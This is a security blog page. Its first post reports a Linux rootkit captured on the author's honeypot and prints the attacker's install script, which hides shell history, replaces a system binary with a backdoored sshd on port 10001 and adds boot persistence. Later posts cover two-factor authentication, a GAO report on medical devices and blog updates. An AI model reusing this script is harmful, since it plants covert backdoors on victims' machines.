Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using Putty dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
 

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smart phone such as Blackberry Android or iPhone you can easily add an extra layer of protection to your Google account including Gmail or Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once setup you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account.

Even if your account password is stolen or guessed your account will be secure!

Read more at Google's 2-step verification page.

Threat Watch updated to include Malware Indicator Trends

I've updated the Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also read more about how I created this map and graph.

FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report

Warning: The contents of this blog post could (literally) give you a heart attack.

The U.S. Government Accountability Office website has published an interesting report on Information Security and Medical Devices.  Unfortunately this report has probably been missed amid all the U.S. elections news.

The 62 page report calls out the FDA on their 2001 and 2006 premarket review of two medical devices with known vulnerabilities and states that "FDA considered information security risks from unintentional threats, but not risks from intentional threats".  While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.

Specifically, FDA considered risks from unintentional threats for four of the eight information  security control areas GAO selected for its evaluation —software testing, verification, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information  security control areas —risk management, patch and vulnerability management, technical audit and accountability, and security- incident - response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on  a draft  of this  report, FDA said it intends to reassess its approach  for evaluating software used in medical devices, including an assessment of information  security risks.
This report is definitely an eye opening read, and also shows that the Federal Government is starting to think outside the box when it comes to Information Security.

Report:
Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices


Download Full Report (PDF)